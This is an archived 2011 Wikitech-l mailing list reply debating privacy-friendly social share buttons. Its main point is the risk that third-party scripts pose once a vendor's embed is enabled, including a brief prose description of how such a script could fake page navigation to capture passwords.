On Sun, 30 Oct 2011 01:12:51 -0700, Marco Schuster <[email protected]> wrote:
> On Sat, Oct 29, 2011 at 4:22 PM, Daniel Friesen > <[email protected]> wrote: >> - It doesn't scale very well. If you do try to add more vendors and >> users >> do enable most of them, you still end up loading from each enabled >> vendor >> slowing things down. > With the exception of the FB Like/Recommend button, everything (even > the FB share link) is just an image paired with a HTML link. Maybe > other sites allow embedding their logos, so the only image which needs > to be loaded externally is the FB one. No, both the Twitter and Google +1 share features in that socialshareprivacy are also embeds, not simple images paired with links. In fact while FB has a static share and Twitter has it's static share and intents, being the newest +1 hasn't implemented a static share feature yet. Likely somewhat related to the separation of +1 and G+ which unlike with the others +1ing something doesn't mean you're using G+. >> - Frankly the UI is pretty bad. > That's the price you have to pay for total privacy, unfortunately. No, there are other potential possibilities that don't include a bad ui. >> - Once you enable a vendor we drop right back to a 3rd party script >> being >> injected into the page such that it can do malicious things. >> >> Btw, if you're a 3rd party with a script in a page you can go pretty far >> abusing XHR and history.pushState to make it look to a user like they're >> browsing the website normally when in reality they're on the same page >> with the script still running. Oh, and that includes making it look like >> you're safely visiting the login page when in reality you didn't change >> pages and the script is still running ready to catch passwords. > Do you have any links with further info on this? > > Marco I don't know of any specific links you can look at, I realized it myself after looking at pushState. It's probably known elsewhere but I figured it out independently so I don't know of any more detailed articles or posts on it off my head. -- ~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://daniel.friesen.name] _______________________________________________ Wikitech-l mailing list [email protected] https://lists.wikimedia.org/mailman/listinfo/wikitech-l
